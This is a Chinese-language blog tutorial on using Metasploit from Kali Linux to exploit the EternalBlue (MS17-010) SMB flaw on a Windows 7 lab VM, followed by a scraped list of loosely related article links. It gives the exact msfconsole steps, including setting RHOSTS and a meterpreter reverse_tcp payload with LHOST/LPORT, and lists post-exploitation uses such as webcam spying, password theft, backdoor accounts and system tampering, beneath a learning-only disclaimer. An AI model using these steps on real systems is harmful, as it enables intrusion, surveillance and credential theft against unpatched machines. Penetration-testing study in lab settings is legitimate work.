目录

<一>:metasploit 简述

<二>:msf 使用法则

<三>:启动 metasploit 前需要做的事项

<四>:metasploit 攻击 windows 系统

metasploit 攻击 eternalblue(永恒之蓝)全流程:

(1):使用模块

(2):配置模块必选项

​               (3):运行模块

(4):设置必选项(补充)

<五>:meterpreter 攻击成功后能做什么

<一>:metasploit 简述

metasploit 简称 msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新。

<二>:msf 使用法则

使用模块 ->配置模块必选项->运行模块

<三>:启动 metasploit 前需要做的事项

①:打开Kali终端

②:使用sudo su 命令,并输入 Kali 的密码,切换至root用户

③:使用 msfdb init 命令初始化 metasploit 数据库(*可选)

<四>:metasploit 攻击 windows 系统

msfconsole:启动 metasploit 命令行 (命令行效率高,方便使用)

metasploit 攻击 eternalblue(永恒之蓝)全流程:

(1):使用模块

①:搜索微软给永恒之蓝的漏洞号:search ms17_010

②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue

(2):配置模块必选项

查看必选项[*required 为 yes 的就是必选项]

①:show options (查看设置)

                (3):运行模块

以虚拟机上的xin7操作系统为靶机为例 (先同时按win+R,然后输入cmd,回车,最后输入ipconfig,查看被攻击的靶机IP地址)

①:set RHosts 被攻击的IP地址

②:show options (查看是否还有必选项需要修改)

③:set LPORT 0~65536 (为了防止攻击失败多设置一个)

④:run (攻击操作系统,并获取命令运行最低权限)

(注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)

(4):设置必选项(补充)

①: set RHosts 被攻击的IP地址

[*RHOSTS 为 target host(s)代表要攻击谁]

②: set Payload windows/x64/meterpreter/reverse_tcp

[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter]

[*meterpreter 是metasploit 后渗透的神器 ]

③:set LHOST 攻击的IP地址

[*LHOST 为 listen host 代表你是谁]

④:set LPORT 攻击方使用的监听端口

[* LPORT 为 listen port 代表要在攻击方上开启的端口,1~65535随便选,但不能被占用]

(5):meterpreter 后输入 help,可显示攻击成功后可用的权限

<五>:meterpreter 攻击成功后能做什么

meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。

(注:此文章及操作流程只限于学习交流,请勿进行非法操作,做遵纪守法公民)

在Kali操作系统上使用metasploit相关推荐

  1. msf win10漏洞_在Kali Linux上使用Metasploit攻击Win10机器的技巧

    Metasploit框架是全球黑客最常用的框架.它允许黑客设置创建有利环境(称为Meterpreter)的侦听器来操纵受感染的计算机.在本文中,我们将了解Kali Linux中的这个框架如何用于攻击w ...

  2. metasploit下载教程linux,在Debian 10/9系统上安装Metasploit Framework的方法

    本文介绍在Debian 10/9操作系统上安装Metasploit Framework的方法,以脚本的方式安装,全程相当的简单,按照以下步骤操作即可. 在Debian 10/Debian 9上安装Me ...

  3. mac使用被动ftp模式(pasv)_网络安全工程师与白帽子黑客教你:Kali Linux之使用Metasploit进行FTP服务扫描实战...

    本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一.背景介绍 FTP是用来在两台计算机之间传输文件,是Inter ...

  4. 网络攻防——kali操作系统基本使用

    1.阅读前的声明     本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为). 2.环境安装     生成木马主要需要如下工具:kali操作系统,V ...

  5. 笔记本或者台式机安装kali操作系统

    1.下载kali操作系统:(我用的是阿里云镜像下载) https://mirrors.aliyun.com/kali-images/current/kali-linux-2022.3-installe ...

  6. kali操作系统+信息搜集工具

    1.完善自己虚拟机的kali linux系统,将系统升级到最新版本 2.配置kali操作系统 修改更新源 /etc/apt/sources.list apt-get update  更新软件列表 ap ...

  7. kail linux纯文本浏览器,在Linux Mint/Kali Linux上安装Vivaldi Web浏览器的方法

    本文介绍在Linux Mint/Kali Linux操作系统上安装Vivaldi Web浏览器的方法,只需要下面两个步骤即可,即先添加APT存储库然后运行命令安装. 一.添加APT存储库 Vivald ...

  8. 从Qcheck 1.3 不能在不同操作系统上运行问题(chro124、chro342)说开来------

    [本文重在技巧学习,授人以鱼,不如授人以渔!!!] 因为公司项目需要对带宽占用进行测试, 最近看电子工业出版社<网络管理工具使用详解>就qcheck  1.3 不能在不同的操作系统之间运行 ...

  9. Linux操作系统上lsof命令详解

    Linux操作系统上lsof命令详解 2011-10-08 18:31:31 http://xjsunjie.blog.51cto.com/999372/682865 标签:Linux lsof命令 ...

最新文章

  1. nginx安装配置http、tcp代理
  2. java归并排序代码_Java归并排序算法
  3. 错误摘要 HTTP 错误 403.14 - Forbidden Web 服务器被配置为不列出此目录的内容。
  4. java对集合的操作_Java中对List集合的常用操作
  5. java对象的状态由什么表示_持久化层的Java对象可处于哪些状态?这些状态有哪些特征?...
  6. .net Cache 需要注意的地方
  7. 风变编程python第一关_风变编程python学习心得
  8. C++ STL详解超全总结(快速入门STL)
  9. Flink重启策略Restart-Strategy
  10. 环球黑卡可以透支吗?环球黑卡是信用卡吗
  11. 记录一个pycharm的神奇bug
  12. matplotlib 柱状图画误差棒
  13. RTSP视频边缘计算网关EasyNVR在5G时代有什么运用价值?
  14. LED数码管段码生成
  15. UI5:创建.yaml文件报错:无法加载文件 C:\Users\86178\AppData\Roaming\npm\ui5.ps1
  16. 经济放缓 全球角色逆转
  17. 获取打印机分辨率_为孩子准备的第一台口袋打印机,喵喵机P2S评测
  18. pycharm 破解方法
  19. 【IntelliJ IDEA 2019.2】java读取发送pc串口数据
  20. 手机拍照要注意光线问题

热门文章

  1. kbhit linux windows通用,_kbhit() for Linux
  2. Context Menus
  3. [转]【C/C++】STL详解
  4. 用Java实现简单的井字棋程序(α-β剪枝)
  5. 服务器和网站APP为什么会被反复入侵
  6. vue的entries和nextTick
  7. 用“等待-通知”机制优化循环等待
  8. mysql查询学生表年龄语句_mysql中一张(居民)表按年龄段查询数据
  9. 如何安装redis和给wordpres加速?
  10. 相册服务器维护,相册云服务器